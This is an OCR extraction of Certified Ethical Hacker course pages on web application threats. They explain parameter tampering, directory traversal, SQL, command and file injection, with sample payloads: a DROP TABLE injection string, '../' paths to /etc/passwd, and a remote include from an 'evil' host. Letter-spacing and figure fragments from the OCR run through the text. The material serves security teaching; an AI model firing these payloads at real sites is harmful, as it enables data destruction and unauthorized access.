U n v a l i d a t e d I n p u t
In order to bypass the security system, attackers tam per w ith the h ttp requests, URL,
headers, form fields, hidden fields, query strings etc. Users' login IDs and oth e r related
Module 13 Page 1750

Exam 312-50 C ertified Ethical HackerEthical Hacking and Counterm easures
data gets stored in the cookies and this becomes a source o f attack fo r the intruders. Attackers
gain access to the victim 's system using the inform ation present in cookies. Examples o f attacks
caused by unvalidated input include SQL injection, cross-site scripting (XSS), buffer overflow s,
etc.
C r o s s - s i t e S c r i p t i n g (X S S )
" i T f An attacker bypasses the clients ID security m echanism and gains access privileges, and
then injects m alicious scripts into the web pages o f a particular website. These m alicious scripts
can even rew rite the HTML content o f the website.
I n j e c t i o n F la w s
Injection flaws are w eb application vulnerabilities th a t allow untrusted data to be
interpreted and executed as part o f a com m and or query.
S Q L I n j e c t i o n
This is a type o f attack w here SQL com m ands are injected by the attacker via input
data; then the attacker can tam per w ith the data.
P a r a m e t e r / F o r m T a m p e r i n g
a This type o f tam pering attack is intended to m anipulating the param eters exchanged
betw een client and server in order to m o d ify application data, such as user credentials
and permissions, price and qua n tity o f products, etc. This inform ation is actually stored in
cookies, hidden form fields, or URL Query Strings, and is used to increase application
fu n ctio n a lity and control. Man in the m iddle is one o f the examples fo r this type o f attack.
Attackers use tools like W eb scarab and Paros proxy fo r these attacks.
D e n i a l - o f - S e r v i c e ( D o S )
M | | M ' '
t__ i__ A denial-of-service attack is an attacking m ethod intended to te rm in a te the
operations o f a w ebsite or a server and make it unavailable to intended users. For
instance, a w ebsite related to a bank or em ail service is not able to function fo r a few hours to a
few days. This results in loss o f tim e and money.
B r o k e n A c c e s s C o n t r o l
Broken access control is a m ethod used by attackers w here a particular fla w has been
identified related to the access control, w here a u th e n tica tio n is bypassed and the
attacker com prom ises the netw ork.
VA /// C r o s s - s i t e R e q u e s t F o r g e r y
The cross-site request forgery m ethod is a kind o f attack w here an authenticated user
in m ade to perform certain tasks on the w eb application th a t an attackers chooses. For
exam ple, a user clicking on a particular link sent through an em ail or chat.
I n f o r m a t i o n L e a k a g e
Inform ation leakage can cause great losses fo r a com pany. Hence, all sources such as
Module 13 Page 1751 Ethical Hacking and Countermeasures C opyright © by EC-C0UnCil
All Rights Reserved. R eproduction is S trictly Prohibited.

Exam 312-50 C ertified Ethical HackerEthical Hacking and Counterm easures
systems or oth e r netw ork resources m ust be protected from inform ation leakage by em ploying
proper content filte rin g m echanism s.
I m p r o p e r E r r o r H a n d l i n g
It is necessary to define how the system or netw ork should behave when an error
occurs. O therw ise, it may provide a chance fo r the attacker to break into the system.
Im proper e rro r handling may lead to DoS attacks.
L o g T a m p e r i n g
Logs are m aintained by w eb applications to track usage patterns such as user login
credentials, adm in login credentials, etc. Attackers usually inject, delete, or tam per
w ith w eb application logs so th a t they can perform m alicious actions or hide th e ir identities.
B u f f e r O v e r f l o w
A w eb application's b uffer overflow vulnerability occurs when it fails to guard its
buffer properly and allows w ritin g beyond its m axim um size.
B r o k e n S e s s io n M a n a g e m e n t
W hen security-sensitive credentials such as passwords and oth e r useful m aterial are
not properly taken care, these types o f attacks occur. Attackers com prom ise the
credentials through these security vulnerabilities.
S e c u r i t y M i s c o n f i g u r a t i o n
Developers and netw ork adm inistrators should check th a t the entire stack is
configured properly or security m isconfiguration can happen at any level o f an
application stack, including the platform , w eb server, application server, fram ew ork, and
custom code. Missing patches, m isconfigurations, use o f default accounts, etc. can be detected
w ith the help o f autom ated scanners th a t attackers exploit to com prom ise w eb application
security.
B r o k e n A c c o u n t M a n a g e m e n t
---------- Even authentication schemes th a t are valid are weakened because o f vulnerable
account m anagem ent functions including account update, fo rg o tte n or lost password recovery
or reset, password changes, and oth e r sim ilar functions.
I n s e c u r e S t o r a g e
W eb applications need to store sensitive inform ation such as passwords, credit card
num bers, account records, or oth e r authentication inform ation som ew here; possibly
in a database or on a file system. If proper security is not m aintained fo r these storage
locations, then the w eb application may be at risk as attackers can access the storage and
misuse the inform ation stored. Insecure storage o f keys, certificates, and passwords allow the
attacker to gain access to the w eb application as a le g itim a te user.
Module 13 Page 1752 Ethical Hacking and Countermeasures C opyright © by EC-C0UnCil
All Rights Reserved. R eproduction is S trictly Prohibited.

W e b A p p l i c a t i o n T h r e a t s ■ 2 C E H
Failure to
R e s tric t URL
Access
‫׳‬V
S e c u rity
M a n a g e m e n t
E x p lo its
&
v 1‫־‬
In s u ffic ie n t
T ra n s p o rt L aye r
P ro te c tio n
O b fu s c a tio n
A p p lic a tio n
D M Z
P ro to c o l A tta c k s
U n v a lid a te d
R e d ire c ts a nd
F o rw a rd s
M a lic io u s
File E xe cu tio n
Session
F ix a tio n A tta c k
P la tfo rm
E xp lo its
In se cu re
D ire c t O b je c t
R e fe re n ce s
In se cu re
C ry p to g ra p h ic
S to ra g e
A u th e n tic a tio n W e b S ervices
H ija ckin g A tta c k s
W e b A p p l i c a t i o n T h r e a t s 2 ‫־‬
P l a t f o r m E x p l o i t s
Various w eb applications are built on by using d iffe re n t platform s such as BEA W eb logic and
ColdFusion. Each platform has various vulnerabilities and exploits associated w ith it.
in I n s e c u r e D i r e c t O b j e c t R e f e r e n c e s
§ W hen various in te rn a l im p le m e n ta tio n objects such as file, directory, database
record, or key are exposed through a reference by a developer, then the insecure direct object
reference takes place.
For exam ple, w here a bank account num ber is made a prim ary key, then there is a good change
it can be com prom ised by the attacker based on such references.
I n s e c u r e C r y p t o g r a p h i c S t o r a g e
W hen sensitive data has been stored in the database, it has to be properly encrypted
using cryptography. A few cryptographic encryption m ethods developed by developers are not
up to par. Cryptographically very strong encryption m ethods have to be used. At the same tim e,
care m ust be taken to store the cryptographic keys. If these keys are stored in insecure places,
then the attacker can obtain them easily and decrypt the sensitive data.
Module 13 Page 1753

A u t h e n t i c a t i o n H i j a c k i n g
In order to identify the user, every w eb application uses user identificatio n such as a
user ID and password. Once the attacker com prom ises the system, various m alicious
things like th e ft o f services, session hijacking, and user im personation can occur.
N e t w o r k A c c e s s A t t a c k s
fill 11=
N etw ork access attacks can m ajorly im pact w eb applications. These can have an effect
on basic level o f services w ith in an application and can allow access th a t standard HTTP
application m ethods w ould not have access to.
C o o k i e S n o o p in g
= Attackers use cookie snooping on a victim 's system to analyze th e ir surfing habits and
sell th a t inform ation to oth e r attackers or may use this inform ation to launch various
attacks on the victim 's w eb applications.
W e b S e r v ic e s A t t a c k s
W eb services are process-to-process com m unications th a t have special security issues
and needs. An attacker injects a m alicious script into a w eb service and is able to
disclose and m odify application data.
- ^ I n s u f f i c i e n t T r a n s p o r t L a y e r P r o t e c t i o n
SSL/TLS authentications should be used fo r authentication on w ebsites or the attacker
can m o n ito r netw ork tra ffic to steal an authenticated user's session cookie.
Various threats such as account th e ft, phishing attacks, and adm in accounts may happen after
systems are being com prom ised.
r ‫״‬ H i d d e n M a n i p u l a t i o n
I
These types o f attacks are m ostly used by attackers to com prom ise e-com m erce
websites. Attackers m anipulate the hidden fields and change the data stored in them . Several
online stores face this type o f problem every day. Attackers can alter prices and conclude
transactions w ith the prices o f th e ir choice.
D M Z P r o t o c o l A t t a c k s
The DMZ (D em ilitarized Zone) is a sem i-trusted netw ork zone th a t separates the
untrusted Internet from the com pany's trusted internal netw ork. An attacker w ho is able to
com prom ise a system th a t allows other DMZ protocols has access to oth e r DMZs and internal
systems. This level o f access can lead to:
© Com prom ise o f the w eb application and data
Q D efacem ent o f websites
© Access to internal systems, including databases, backups, and source code
Module 13 Page 1754

U n v a l i d a t e d R e d i r e c t s a n d F o r w a r d s
_____ Attackers make a victim click an unvalidated link th a t appears to be a valid site. Such
redirects may a tte m p t to install m alw are or tric k victim s into disclosing passwords or
oth e r sensitive inform ation. Unsafe forw ards may allow access control bypass leading to:
0 Session fixation attacks
© Security m anagem ent exploits
0 Failure to restrict URL access
e M alicious file execution
F a i l u r e t o R e s t r i c t U R L A c c e s s
An app ication often safeguards or protects sensitive fu n ctio n a lity and prevents the
displays o f links or URLs fo r protection. Attackers access those links or URLs directly
and perform illegitim ate operations.
O b f u s c a t i o n A p p l i c a t i o n
Attackers usually w ork hard at hiding th e ir attacks and to avoid detection. N etw ork
and host intrusion detection systems (IDSs) are constantly looking fo r signs o f w ell-
know n attacks, driving attackers to seek d iffe re n t ways to rem ain undetected. The m ost
com m on m ethod o f attack obfuscation involves encoding portions o f the attack w ith Unicode,
UTF-8, or URL encoding. Unicode is a m ethod o f representing letters, num bers, and special
characters so these characters can be displayed properly, regardless o f the application or
underlying platform in which they are used.
S e c u r i t y M a n a g e m e n t E x p l o i t s
Some attackers target security m anagem ent systems, either on netw orks or on the
application layer, in order to m odify or disable security enforcem ent. An attacker w ho
exploits security m anagem ent can directly m odify p ro te ctio n policies, delete existing policies,
add new policies, and m odify applications, system data, and resources.
__ L * S e s s io n F i x a t i o n A t t a c k
______ In a session fixation attack, the attacker tricks or attracts the user to access a
legitim ate w eb server using an explicit session ID value.
M a l i c i o u s F i l e E x e c u t i o n
___ M alicious file execution vulnerabilities had been found on m ost applications. The
cause o f this vulnerability is because o f unchecked input into the w eb server. Due to
this unchecked input, the files of attackers are easily executed and processed on the web
server. In addition, the attacker perform s rem ote code execution, installs the ro o tk it rem otely,
and in at least some cases, takes com plete control over the systems.
Module 13 Page 1755

C E HU n v a l i d a t e d I n p u t
An attacker exploits inp u t validation flaw s to
p erform cross-site scripting, b uffe r overflow ,
injection attacks, etc. th a t result in data
th e ft and system m a lfun ctio n in g
D a ta b a s e
• B row ser input not
• validated by the w eb
: application
s t r in g s q l — ,,s e l e c t * from U sers
where
u se r = ‫י‬ " + U se r. T ex t + ‫י‬‫יי‬
and pwd= ‫״‬‫י‬ + P assw o rd .T ex t + ‫״‬ !« r
In p u t validation flaw s refers to a w eb application
vulnerability w here in p u t fro m a clie n t is not
valid a te d before being processed by w eb
applications and backend servers
Boy.com
h t t p : / / j u g g y b o y . c o m / l o g i n . a s p x
? u s e r = j a s o n s 0 p a s s = s p r x n g f i e ld
M o d ifie d Q ueryB row ser Post Request
U n v a l i d a t e d I n p u t
An input va lid a tio n fla w refers to a w eb application vulnerability w here input from a
client is not validated before being processed by w eb applications and backend servers. Sites
try to protect them selves from m alicious attacks through input filtra tio n , but there are various
m ethods prevailing fo r the the purpose o f encoding. M any h ttp inputs have m ultiple form ats
th a t make filte rin g very d ifficu lt. The canonicalization m ethod is used to sim plify the encodings
and is useful in avoiding various vulnerable attacks. W eb applications use only a client-side
m echanism in input validation and attackers can easily bypass it. In order to bypass the security
system, attackers tam per the h ttp requests, URLs, headers, form fields, hidden fields, and query
strings. Users‫׳‬ login IDs and oth e r related data gets stored in the cookies and this becomes a
source o f attack fo r intruders. Attackers gain access to the systems by using the inform ation
present in the cookies. Various m ethods used by hackers are SQL injection, cross-site scripting
(XSS), b uffer overflow s, fo rm a t string attacks, SQL injection, cookie poisoning, and hidden field
m anipulation th a t result in data th e ft and system m alfunctioning.
Module 13 Page 1756

h t t p : / / ju g g y b o y . c o m / l o g i n . a s p x
? u s e r = ja s o n s @ p a s s = s p r in g f ie ld
D a ta b a s e
: Brow ser input not
: validated by th e w eb
: application
s t r in g s q l — ,,s e l e c t * from U sers
Wtmmrnmr* w here
u s e r = ' ” + U se r .T e x t + ‫״‬ '
and pwd=1‫״‬ + P a ssw o r d .T e x t + " '"r
M o d ifie d Q ueryB ro w se r Post R equest
F ig u re 1 3 .5 : U n v a lid a te d In p u t
Module 13 Page 1757

‫ו‬
C E H
Urtifwd tlfcxjl lUthM
J A w eb param eter tam pering attack involves the m anip u la tio n o f param eters exchanged between ______ . - - .
client and server in o rder to m odify application data such as user credentials and perm issions,
price, and q uantity o f products
J A param eter tam pering attack e xplo its vu ln e ra b ilitie s in integrity and logic validation mechanisms
th a t may result in XSS, SQL injection, etc.
C o p yrig h t © by E&Coinal. A ll R ights R eserved. R ep ro d u ctio n is S trictly Pro h ibited .
r-• ■‫ייי‬‫ח‬
Param eter tam pering is a sim ple form o f attack aim ed directly at the application's
business logic. This attack takes advantage o f the fact th a t m any program m ers rely on hidden
or fixed fields (such as a hidden tag in a form or a param eter in an URL) as the only security
measure fo r certain operations. To bypass this security m echanism , an attacker can change
these param eters.
D etailed D escription
Serving the requested files is the m ain function o f w eb servers. During a w eb session,
param eters are exchanged betw een the w eb brow ser and the w eb application in order
to m aintain inform ation about the client's session, which elim inates the need to m aintain a
com plex database on the server side. URL queries, form fields, and cookies are used to pass the
param eters.
Changed param eters in the form field are the best exam ple o f param eter tam p e rin g . W hen a
user selects an HTML page, it is stored as a form field value, and transferred as an HTTP page to
the web application. These values may be pre-selected (com bo box, check box, radio buttons,
etc.), free text, or hidden. An attacker can m anipulate these values. In some extrem e cases, it is
just like saving the page, editing the HTML, and reloading the page in the w eb browser.
0 (D ® 1
| http://www.juggybank.com/cust.asp?profile=21&debit=2500< ........J■• T a m p erin g w ith th e |
URL p a ra m e te rs 1
0 @ ® 1
| http://www.juggybank.com/cust.asp?profile=82&debtt=lSOO< ........J•■1...... .........
| http://www.juggybank.com/stat.asp?pg=531&status=view < .........
O th e r p a ra m e te rs can
be ch an g e d in c lu d in g
a ttrib u te p a ra m e te rs
0 © ®
| http://www.juggybank.com/stat.asp?pg-147&status‫־‬ delete < ••••
Module 13 Page 1758

Hidden fields th a t are invisible to the end user provide inform ation status to the web
application. For exam ple, consider a product order form th a t includes the hidden field as
follow s:
< in p u t ty p e = "h id d e n " n a m e = "p ric e " v a lu e = "9 9 . 90">
Combo boxes, check boxes, and radio buttons are examples o f pre-selected param eters used to
transfer inform ation betw een d iffe re n t pages, w hile allow ing the user to select one o f several
predefined values. In a param eter tam pering attack, an attacker may m anipulate these values.
For exam ple, consider a form th a t includes the com bo box as follow s:
<FORM METHOD=POST AC TIO N ="xferM oney. a sp ‫״‬ >
Source A c c o u n t: <SELECT NAME="SrcAcc">
<OPTION VALUE=" 1 2 3 4 5 6 7 8 9 "> ******7 8 9</OPTION>
<OPTION V A LU E ="868686868">******868</O P TIO N X /S E LE C T>
<BR>Amount: <INPUT NAME="Amount" SIZE=20>
< B R > D e s tin a tio n A c c o u n t: <INPUT NAME="DestAcc" SIZE=40>
<BRXINPUT TYPE=SUBMIT> <INPUT TYPE=RESET>
</FORM>
Bypassing
An attacker may bypass the need to choose betw een tw o accounts by adding another account
into the HTML page source code. The new com bo box is displayed in the w eb brow ser and the
attacker can choose the new account.
HTML form s subm it th e ir results using one o f tw o m ethods: GET or POST. In the GET m ethod,
all form param eters and th e ir values appear in the query string o f the next URL, which the user
sees. An attacker may tam per w ith this query string. For exam ple, consider a w eb page th a t
allows an authenticated user to select one o f his or her accounts from a com bo box and debit
the account w ith a fixed unit am ount. W hen the subm it button is pressed in the w eb browser,
the URL is requested as follow s:
http://w w w .iuggvbank.com /cust.asp?profile=21& debit=2500
An attacker may change the URL param eters (profile and debit) in order to debit another
account:
http://w w w .iuggybank.com /cust.asp?profile=82& debit=1500
There are other URL param eters th a t an attacker can m odify, including a ttrib u te param eters
and internal m odules. A ttrib u te param eters are unique param eters th a t characterize the
behavior o f the uploading page. For exam ple, consider a content-sharing w eb application th a t
enables the content creator to m odify content, w hile oth e r users can only view the content.
The w eb server checks w heth e r the user w ho is accessing an entry is the author or not (usually
by cookie). An ordinary user w ill request the follow ing link:
http://w w w .iuggybank.com /stat.asp?pg=531& status=view
Module 13 Page 1759

An attacker can m odify the status param eter to ‫״‬delete‫״‬ in order to delete perm ission fo r the
content.
http://w w w .iuggybank.com /stat.asp?pg=147& status=delete
P aram eter/form tam pering can lead to th e ft o f services, escalation o f access, session hijacking,
and assuming the id e n tity o f other users as well as param eters allow ing access to developer
and debugging inform ation.
T a m p e rin g w ith th e U RL
p a ra m e te rs
O th e r p a ra m e te rs ca n b e
c h a n g e d in c lu d in g a ttr ib u te
p a ra m e te rs
http://www.juggybank.com/cust.asp?profile=21&debit=2500
[GO
‫ר‬http://www.juggybank.com/cust.asp?profile=82&debit=1500
h ttp ://w w w .juggybank.com /stat. asp?pg=531&status=view <£
| GO
‫ך‬http://w w w .ju ggyban k.com /stat.a sp?pg=1 47& status=delete
|QO
FIGURE 13.6: Form Tampering
Module 13 Page 1760

D i r e c t o r y T r a v e r s a l C E H
C«rt1fW4 itkiul Nm Im
v D i r e c t o r y T r a v e r s a l
___ W hen access is provided outside a defined application, there exists the possibility o f
unintended inform ation disclosure or m odification. Com plex applications exist as application
com ponents and data, which are typically configured in m ultiple directories. An application has
the ability to traverse these m ultiple directories to locate and execute the legitim ate portions o f
an application. A directory traversal/forceful browsing attack occurs when the attacker is able
to browse fo r directories and files outside the norm al application access. A D irectory
Traversal/Forceful Browsing attack exposes the d ire cto ry structure o f an application, and often
the underlying w eb server and operating system. W ith this level o f access to the web
application architecture, an attacker can:
© Enum erate the contents of files and directories
© Access pages th a t otherw ise require authentication (and possibly paym ent)
© Gain secret know ledge o f the application and its construction
© Discover user IDs and passwords buried in hidden files
© Locate source code and other interesting files left on the server
© View sensitive data, such as custom er inform ation
Module 13 Page 1761

The follow ing exam ple uses to backup several directories and obtain a file containing a
backup o f the web application:
h ttp ://w w w .ta rg e tsite .co m /../../../site b a cku p .zip
This exam ple obtains the "/e tc/p a ssw d " file from a UNIX/Linux system, which contains user
account inform ation:
h ttp ://w w w .ta rg e ts ite .c o m /../../../../e tc /p a s s w d
Let us consider another example where an attacker tries to access files located outside the web
publishing directory using directory traversal:
http://w w w .iuggybov.com /process.aspx=.J . / s o m e dir/som e file
h ttp ://w w w .iu g g yb o y.co m /../■ ./../../so m e dir/som e file
The pictorial representation o f directory traversal attack is shown as follow s:
s
<?php
$theme — 'Jaoon.php',
J 1 ‫יי‬’‫™־״־‬‫״‬—’‫׳‬*‫׳־‬ ) )
> □c
/../../••/etc/passwd
password files
A tta c k e r
V u ln e ra b le S e rv e r C o d e
ro o t:a 9 8 b 2 4 a Id 3 e 8 :0 : l:S y s te m O p e ra t o r:/:/b in /k sh
d a e m o n : * : l: l: :/ tm p :
J a s o n :a 3 b 6 9 8 a 7 6 f7 6 d 5 7 .:1 8 2 :1 0 0 :D e v e lo p e r:/h o m e /u s e rs /J a s o n / :/ b in / c s h
FIGURE 1 3 .7 : D ire c to ry T ra v e rs a l
Module 13 Page 1762

S e c u r i t y M i s c o n f i g u r a t i o n C E H
Easy Exploitation
Using misconfiguration vulnerabilities, attackers gain
unauthorized accesses to default accounts, read
unused pages, exploit unpatched flaws, and read or
w rite unprotected files and directories, etc.
Common Prevalence
Security misconfiguration can occur at any level
o f an application stack, including the platform,
web server, application server, fram ework, and
custom code
Example
e The application server admin console is automatically
installed and not removed
Default accounts are not changed
Attacker discovers the standard admin pages on server,
logs in with default passwords, and takes over
M S e c u r i t y M i s c o n f i g u r a t i o n
' ____ " Developers and netw ork a d m in istra to rs should check th a t the entire stack is
configured properly or security m isconfiguration can happen at any level o f an application
stack, including the platform , w eb server, application server, fram ew ork, and custom code. For
instance, if the server is not configured properly, then it results in various problem s th a t can
infect the security o f a website. The problem s th a t lead to such instances include server
softw are flaws, unpatched security flaws, enabling unnecessary services, and im proper
authentication. A few o f these problem s can be detected easily w ith the help o f autom ated
scanners. Attackers can access default accounts, unused pages, unpatched flaws, unprotected
files and directories, etc. to gain unauthorized access. All the unnecessary and unsafe features
have to be taken care o f and it proves very beneficial if they are com pletely disabled so th a t the
outsiders d o n 't make use o f them fo r m alicious attacks. All the application-based files have to
be taken care o f through proper authentication and strong security m ethods or crucial
inform ation can be leaked to the attackers.
Examples o f unnecessary features th a t should be disable or changed include:
Q The application server adm in console is autom atically installed and not rem oved
© D efault accounts are not changed
Module 13 Page 1763

6 A ttacker discovers the standard adm in pages on server, logs in w ith default passwords,
and takes over
Ethical Hacking and Countermeasures Exam312-50 Certified Ethical Hacker
Module 13 Page 1764

I n j e c t i o n F l a w s C E H
Injection flaws are web application vulnerabilities that allow untrusted data to be interpreted and executed
as part o f a command or query
Attackers exploit injection flaws by constructing malicious comm ands or queries that result in data loss or
corruption, lack o f accountability, or denial o f access
Injection flaws are prevalent in legacy code, often found in SQL, LDAP, and XPath queries, etc. and can be
easily discovered by application vulnerability scanners and fuzzers
LDAP InjectionCommand InjectionSQL Injection
It involves the injection
of malicious LDAP
statements
o f malicious code through
a web application
o f malicious SQL queries
into user input form s
SQL
Server
JJ
—
I n j e c t i o n F l a w s
Injection flaws are the loopholes in the w eb application th a t allow unreliable data to
be interpreted and executed as part of a com m and or query. The injection flaws are being
exploited by the attacker by constructing m alicious com m ands or queries th a t result in loss of
data or corruption, lack o f accountability, or denial o f access. Injection flaws are prevalent in
legacy code, often found in SQL, LDAP, and XPath queries, etc. These flaws can be detected
easily by application vulnerability scanners and fuzzers. By exploiting the flaw s in the web
application, the attacker can easily read, w rite , delete, and update any data, i.e., relevant or
irrelevant to th a t particular application. They are m any types o f injection flaws; some o f them
are as follow s:
S Q L i n j e c t i o n
SQL injection is the m ost com m on w ebsite vulnerability on the Internet. It is the
technique used to take advantage o f non-validated input vulnerabilities to pass SQL com m ands
through a w eb application fo r execution by a backend database. In this, the attacker injects the
m alicious SQL queries into the user input form and this is usually perform ed to either to gain
unauthorized access to a database or to retrieve inform ation directly from the database.
* C o m m a n d i n j e c t i o n
The flaws in com m and injection are another type o f w eb application vulnerability.
Module 13 Page 1765

These flaws are highly dangerous. In this type o f attack, the attacker injects the m alicious code
via a w eb application.
L A D P i n j e c t i o n
‫־‬ LDAP injection is an attack m ethod in which the w ebsite th a t constructs the LDAP
statem ents from user-supplied input are exploited fo r launching attacks. W hen an application
fails to sanitize the user input, then the LDAP statem ent can be m odified w ith the help o f local
proxy. This in tu rn results in the execution o f a rb itra ry com m ands such as granting access to
unauthorized queries and altering the content inside the LDAP tree.
Module 13 Page 1766

C E HS Q L I n j e c t i o n A t t a c k s
J SQL injection attacks use a series o f m alicious SQL queries to directly
m anipulate the database
J An attacker can use a vulnerable w eb application to bypass norm al se curity
m easures and obtain direct access to the valuable data
J SQL injection attacks can often be executed fro m the address bar, fro m
w ithin application fields, and through queries and searches
SQL injection
attacks
01 < ? p h p
02 f u n c t i o n s a v e e m a il ( $ u s e r , $ m e s s a g e )
03 {
04 $ s q l = "IN S E R T IN TO M e s s a g e s (
05 u s e r , m e s s a g e
06 ) VALUES (
07 ' $ u s e r 1 , ' $ m e s s a g e '
08 )
09 r e t u r n m y s q l_ q u e r y ( $ s q l) ;
10 }
11 ?>
In te rn e tW eb ■‫נ‬.......................
B row ser
t e s t') ;D R O P TABLE M e s s a g e s ;- -
When this code is sent to the database
server, it drops the Messages table
Code to insert spam m y data on behalf of o th e r users SC*L Injection vulnerable server code
t e s t ' ) , ( ' u s e r 2 ' , '1 am J a s o n ') , ( ' u s e r 3 ' , 'Y o u a r e h a c k e dA ttacker
N ote: For com plete coverage o f SQL Injection concepts and techniques, refer to M odule 14: SQL Injection
S Q L I n j e c t i o n A t t a c k s
SQL injection attacks use com m and sequences from S tructured Q uery Language (SQL)
statem ents to control database data directly. A pplications often use SQL statem ents to
authenticate users to the application, validate roles and access levels, store and obtain
inform ation fo r the application and user, and link to o th e r data sources. Using SQL injection
m ethods, an attacker can use a vulnerable w eb application to avoid norm al security measures
and obtain direct access to valuable data.
The reason w hy SQL injection attacks w ork is th a t the application does not properly validate
input before passing it to a SQL statem ent. For exam ple, the follow ing SQL statem ent,
s e le c t * from tablenam e where User1D= 2302 becom es the follow ing w ith a sim ple SQL
injection attack:
SELECT * FROM tablenam e WHERE U serID = 2302 OR 1=1
The expression "OR 1=1" evaluates to the value "TRUE," often allow ing the enum eration o f all
user ID values from the database. SQL injection attacks can often be entered fro m the address
bar, from w ith in application fields, and through queries and searches. SQL injection attacks can
allow an attacker to:
© Log in to the application w ith o u t supplying valid credentials
Module 13 Page 1767

© Perform queries against data in the database, often even data to which the application
w ould not norm ally have access
© M odify the database contents, or drop the database altogether
© Use the tru st relationships established betw een the web application com ponents to
access oth e r databases
01 < ? p h p
02 f u n c t i o n s a v e e m a il ( ? u s e r , ? m e s s a g e )
03 <
04 $ s q l = "IN S E R T IN T O M e s s a g e s (
05 u s e r , m e s s a g e
06 ) VALUES (
07 ' ? u s e r ' , '? m e s s a g e '
08 ) " ;
09 r e t u r n m y s q l q u e r y ( $ s q l ) ;
10 }
11 ?>
SQL Injection vulnerable server code
'Y o u a r e h a c k e d
Internet
m i
W e b
B ro w se r
A
t e s t ') ; D R O P TA BLE M e s s a g e s ;—
W hen this code is sent to the database
server, it drops the Messages table
Code to insert spammy data on behalf of other users
t e s t ' ) , ( ' u s e r 2 ' , '1 am J a s o n ') , C u s e r 3 '
FIGURE 1 3 .8 : SQL In je c tio n A tta c k s
Module 13 Page 1768

-
C o m m a n d I n j e c t i o n A t t a c k s C E H
J An a tta c k e r trie s to c ra ft an in p u t s trin g to g a in shell access to a w e b se rver
J Shell In je c tio n fu n c tio n s in c lu d e s y s t e m ( ) , s t a r t P r o c e s s ( ) ,
ja v a . l a n g . R u n tim e . e x e c ( ) ,S y s te m . D ia g n o s t ic s . P ro c e s s . S t a r t ( ) ,
a nd s im ila r APIs
This ty p e o f a tta c k is used to d e fa c e w e b s ite s v irtu a lly . U sing th is a tta c k , an
a tta c k e r add s an e x tra H T M L -ba se d c o n te n t to th e v u ln e ra b le w e b a p p lic a tio n
In H TM L e m b e d d in g a tta cks, u ser in p u t to a w e b s c rip t is pla ce d in to th e o u tp u t
H TM L, w ith o u t b e in g checked fo r H TM L co d e o r s c rip tin g
J
J The a tta c k e r e x p lo its th is v u ln e ra b ility a nd in je c ts m a lic io u s co de in to syste m
file s
J h t t p : / /w w w . ju g g y b o y . c o m / v u ln e r a b le . p h p ? C O L O R = h ttp : / / e v i l / e x p l o i t ?
C o m m a n d I n j e c t i o n A t t a c k s
— — Com mand injection flaws allow attackers to pass m alicious code to d iffe re n t systems
via a w eb application. The attacks include calls to the operating system over system calls, use of
external program s over shell com m ands, and calls to the backend databases over SQL. Scripts
th a t are w ritte n in Perl, Python, and oth e r languages execute and insert the poorly designed
w eb applications. If a w eb application uses any type o f inte rp re te r, attacks are inserted to inflict
damage.
To perform functions, web applications m ust use operating system features and external
program s. Although m any program s invoke externally, the fre q u e n tly used program is
Sendmail. W hen a piece o f inform ation is passed through the HTTP external request, it m ust be
carefully scrubbed, or the attacker can insert special characters, m alicious com m ands, and
com m and m odifiers into the inform ation. The w eb application then blindly passes these
characters to the external system fo r execution. Inserting SQL is dangerous and rather
w idespread, as it is in the form o f com m and injection. Command injection attacks are easy to
carry out and discover, but they are tough to understand.
^ = = 3 S h e ll I n j e c t i o n
1 To com plete various functionalities, w eb applications use various applications and
program s. It is ju st like sending an em ail by using the UNIXsendmail program . There is
a chance th a t an attacker may inject code into these program s. This kind o f attack is dangerous
Module 13 Page 1769

especially to w eb page security. These injections allow intruders to perform various types of
m alicious attacks against the user's server. An attacker tries to craft an input string to gain shell
access to a w eb server.
Shell injection functions include system (), Start Process (), java.lang.Runtim e.exec (),
System.Diagnostics.Process.Start (), and sim ilar APIs.
H T M L E m b e d d i n g
This type o f attack is used to deface w ebsites virtually. Using this attack, an attacker
adds extra HTML-based content to the vulnerable web application. In HTML
em bedding attacks, user input to a w eb script is placed into the o u tp u t HTML, w ith o u t being
checked fo r HTML code or scripting.
F i l e I n j e c t i o n
a The attacker exploits this vulnerability and injects m alicious code into system files:
http://w w w .iugg vbov.com /vulnerable.p hp?C O LO R = http://evil/e xploit
Users are allow ed to upload various files on the server through various applications and those
files can be accessed through the Internet from any part o f the w orld. If the application ends
w ith a php extensionand if any user requests it, then the application interprets it as a php script
and executes it. This allows an attacker to perform arbitrary com m ands.
Module 13 Page 1770

C o m m a n d I n j e c t i o n E x a m p l e
http://juggyboy/cgi‫־‬ bin/lspro/lspro.cgi?hit_out=1036
c o m^ J u g g y B o y
CUser Name Addison
‫נ‬
‫כ‬
Email Address a d d i@ juggyboy.co~
Site URL ^ www.juggyboy.com
Banner URL [ ■gif ||newpassword|1036|60|468
Password [ newpassword
Poor input validation at server
script was exploited in this attack
that uses database INSERT and
UPDATE record command
Attacker Launching Code
Injection Attack
M alicious code:
w w w . ju g g y b o y . c a m /b a im e r . g ifl|n e w p a s s w o r d ||1 0 3 6
|6 0 |4 6 8
S An attacker enters m alicious code (account
num ber) w ith a new password
6 The last tw o sets o f num bers are the banner
size
« Once th e attacker clicks the subm it b u tto n , the
passw ord fo r the account 1036 is changed to
"ne w pa ssw o rd"
9 The server script assumes th a t only the URL o f
th e banner image file is inserted into th a t field
C o m m a n d I n j e c t i o n E x a m p l e
The follow ing is an exam ple o f com m and injection:
To perform a com m and injection attack, the attacker first enters m alicious code (account
num ber) w ith a new password. The last tw o sets o f num bers are the banner size. Once the
attacker clicks the subm it button, the password fo r the account 1036 is changed to
"new passw ord." The server script assumes th a t only the URL o f the banner image file is
inserted into th a t field.
Module 13 Page 1771

©
M [•..................... > I f http//juggYtx>y/cgibin/lspr0/lspf0cgi?ht1 out 1036
.com
A ttacker Launching Code
Injection A ttack
M alicious code:
U M f N«m« Addison
‫כ‬
‫כ‬
Email Addreu ^ addigojuggytooycom
Sit• U R I [ wwwiuggyboycom
1nn#f URL [ .g if) |newpjssword|1036|fc0|468 ]
Password [ ncwpjsswofd ] !
w w w .^u g g y b o y .c o m /b a n n e r.g ifl|n e w p a s s w o rd l|1 0 3 6
1601468
P o o r in p u t v a lid a tio n a t se rver
scrip t w a s e x p lo ite d in th is a tta ck
th a t u se s d a ta b a se INSERT an d
U PD A TE re co rd co m m a n d
FIGURE 1 3 .9 : C o m m a n d In je c tio n E xa m p le
Module 13 Page 1772

C E HF i l e I n j e c t i o n A t t a c k
<?php
$ d r in k = 'c o k e ';
i f ( i s s e t ( $ _ G E T [ 'DRINK'] )
$d r i n k = $ _ G E T [ 'DRINK'] ;
